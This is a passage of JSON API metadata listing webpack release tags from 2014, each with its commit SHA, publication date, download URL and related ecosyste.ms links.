l_url":"https://github.com/webpack/webpack/releases/tag/v1.4.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.1-beta1/manifests"},{"name":"v1.4.0-beta10","sha":"4afdc81bc4fa95fad705957f335ab48c6f7feb9a","kind":"commit","published_at":"2014-09-17T21:25:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta10/manifests"},{"name":"v1.4.0-beta9","sha":"4e79c9f245c3df0173cb75312cde5f1c51c902f6","kind":"commit","published_at":"2014-09-16T17:36:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta9/manifests"},{"name":"v1.4.0-beta8","sha":"bd02534a588b4ddc2893b5d222836f7c8df8447e","kind":"commit","published_at":"2014-09-15T11:33:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta8/manifests"},{"name":"v1.4.0-beta7","sha":"81748e167a80d79454f44564ca146179b9692e6d","kind":"commit","published_at":"2014-09-15T11:27:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta7/manifests"},{"name":"v1.4.0-beta6","sha":"2eed5961b0433ed22fd0a8d825f7ff15fd0dbeb1","kind":"commit","published_at":"2014-09-11T18:22:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta6/manifests"},{"name":"v1.4.0-beta5","sha":"911b62cfcb702a5971c67a6e2b4f100118bd26e2","kind":"commit","published_at":"2014-09-10T12:10:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta5/manifests"},{"name":"v1.4.0-beta4","sha":"89db931fb0ab82a6a46bb7afa4ae57126d555090","kind":"commit","published_at":"2014-09-07T20:55:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta4/manifests"},{"name":"v1.4.0-beta3","sha":"970e16d69b64df94b1d7f5dcf8e0f6c25cc2ff61","kind":"commit","published_at":"2014-09-03T12:16:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta3/manifests"},{"name":"v1.4.0-beta2","sha":"a912045bd428f3970762a49457e1d5d95316f3c5","kind":"commit","published_at":"2014-08-29T14:08:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta2/manifests"},{"name":"v1.4.0-beta1","sha":"b014b77d7f7de8d5b2f3d8aa0ca2bda1e948fc1d","kind":"commit","published_at":"2014-08-27T15:18:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.4.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.4.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.4.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.4.0-beta1/manifests"},{"name":"v1.3.7","sha":"b9a84f89d40e618357c17430eb61f76ccf48bef2","kind":"commit","published_at":"2014-08-25T14:34:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.7/manifests"},{"name":"v1.3.6","sha":"19b618133a121d2fad838e74b0879fa94dfeef3d","kind":"commit","published_at":"2014-08-25T11:38:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.6/manifests"},{"name":"v1.3.5","sha":"382635d711081fb6fedb75719e4c7f0e1e40f766","kind":"commit","published_at":"2014-08-25T08:45:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.5/manifests"},{"name":"v1.3.4","sha":"b9ac3fa3c77d64856503013a7262efd5b368a199","kind":"commit","published_at":"2014-08-25T08:20:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.4/manifests"},{"name":"v1.3.3-beta2","sha":"2a419ccbeab05d91a9f14fa6ac1e2037678d8f29","kind":"commit","published_at":"2014-08-14T09:34:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta2/manifests"},{"name":"v1.3.3-beta1","sha":"5a447ad7c39b63c037f56daf6df7d1df9074d1c8","kind":"commit","published_at":"2014-08-03T19:37:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.3-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.3-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.3-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.3-beta1/manifests"},{"name":"v1.3.2-beta9","sha":"a7d7c4ca2fb245d22fa98944d32acfff4746ac44","kind":"commit","published_at":"2014-07-28T22:15:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta9/manifests"},{"name":"v1.3.2-beta8","sha":"18ad6548134d5ff40fd04633e8e1375ddb005cc1","kind":"commit","published_at":"2014-07-26T15:54:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta8/manifests"},{"name":"v1.3.2-beta7","sha":"0dd1a69b97161df01a6bdd41d5f32bb4135af50a","kind":"commit","published_at":"2014-07-26T12:48:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta7/manifests"},{"name":"v1.3.2-beta6","sha":"7f6f44df1bb9ca055ac0eaed89aa0dca4e8dc6fa","kind":"commit","published_at":"2014-07-24T15:54:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta6/manifests"},{"name":"v1.3.2-beta5","sha":"cca21ee10756dbb8edb6fb283391f304a197295f","kind":"commit","published_at":"2014-07-24T13:08:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta5/manifests"},{"name":"v1.3.2-beta4","sha":"8d90c0f5b5998ebaf3e61ac443ec01a223d456e9","kind":"commit","published_at":"2014-07-23T12:42:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta4/manifests"},{"name":"v1.3.2-beta3","sha":"d76600101ccc5aef0be148909a336baf3d2ccfce","kind":"commit","published_at":"2014-07-19T12:35:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta3/manifests"},{"name":"v1.3.2-beta2","sha":"9d4cbb125445f4c2bb99c5b55a16c3255ae1d247","kind":"commit","published_at":"2014-07-18T11:32:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta2/manifests"},{"name":"v1.3.2-beta1","sha":"0ab5a3e993386b54afab416b5bc02747658469e6","kind":"commit","published_at":"2014-07-17T00:06:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.2-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.2-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.2-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.2-beta1/manifests"},{"name":"v1.3.1-beta9","sha":"53c38582e6ceb31aefab5237b042148dd6712151","kind":"commit","published_at":"2014-07-16T18:57:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta9/manifests"},{"name":"v1.3.1-beta8","sha":"6c50e7c3883ac24c4f3dcd7b8a11f9545c230589","kind":"commit","published_at":"2014-07-09T11:37:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta8/manifests"},{"name":"v1.3.1-beta7","sha":"287984cb54ed896c85778dc1874ec05195b99a11","kind":"commit","published_at":"2014-07-07T11:22:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta7/manifests"},{"name":"v1.3.1-beta6","sha":"5113a81dd9cdbf35cb104e50480b4c858105b795","kind":"commit","published_at":"2014-07-04T11:02:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta6/manifests"},{"name":"v1.3.1-beta5","sha":"197d2f2efa9e42836efe3f0f62c04c58b981a745","kind":"commit","published_at":"2014-07-02T22:00:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta5/manifests"},{"name":"v1.3.1-beta4","sha":"68cc2c6e03d1326bc0c69cab5b1faf7145e1e195","kind":"commit","published_at":"2014-06-23T22:46:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta4/manifests"},{"name":"v1.3.1-beta3","sha":"93beeacdf8e45970349006dc589c8e73b013e832","kind":"commit","published_at":"2014-06-18T21:03:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta3/manifests"},{"name":"v1.3.1-beta2","sha":"af55e54271c5961e6d1bf57b485f5a5463bb5a7f","kind":"commit","published_at":"2014-06-18T09:12:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta2/manifests"},{"name":"v1.3.1-beta1","sha":"8c2327e0b7863853a45ef094dbb8ded520e0314f","kind":"commit","published_at":"2014-06-17T20:46:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.1-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.1-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.1-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.1-beta1/manifests"},{"name":"v1.3.0-beta9","sha":"419eb4dfd9d7ed8ad16688874e33bbe57617e2d8","kind":"commit","published_at":"2014-06-17T20:40:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta9/manifests"},{"name":"v1.3.0-beta8","sha":"d3db09f72066ee23ec241f33ad6dfb00d42e8582","kind":"commit","published_at":"2014-06-12T04:31:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta8/manifests"},{"name":"v1.3.0-beta7","sha":"46a918f5682ec766bc21424311f16fe28bcd8892","kind":"commit","published_at":"2014-06-11T20:52:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta7/manifests"},{"name":"v1.3.0-beta6","sha":"20ad2baf9afd6a8d4e969e9ee094994c7b11905b","kind":"commit","published_at":"2014-06-11T20:26:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta6/manifests"},{"name":"v1.3.0-beta5","sha":"8bfb752c526ef612b2011c7bc266b7adb7a8fcb7","kind":"commit","published_at":"2014-06-05T17:54:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta5/manifests"},{"name":"v1.3.0-beta4","sha":"56e7073abbfec4b920bf1dffb0924027072d0c4e","kind":"commit","published_at":"2014-06-05T07:31:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta4/manifests"},{"name":"v1.3.0-beta3","sha":"5cfd4138d682139af7069342aa66e0495070db9b","kind":"commit","published_at":"2014-06-04T06:48:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta3/manifests"},{"name":"v1.3.0-beta2","sha":"560762a932475e21e68577ba33f9482d738f1edc","kind":"commit","published_at":"2014-06-03T06:45:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta2/manifests"},{"name":"v1.3.0-beta1","sha":"ebac371b7228a04fab834260208d157c5333df0f","kind":"commit","published_at":"2014-06-02T22:19:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.3.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.3.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.3.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.3.0-beta1/manifests"},{"name":"v1.2.0-beta6","sha":"fc6d418e3d5bd0bc6356e82850173c33c52a567a","kind":"commit","published_at":"2014-05-27T09:54:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.2.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.2.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.2.0-beta6","tag_url":"https://repos.ecosyste.ms/a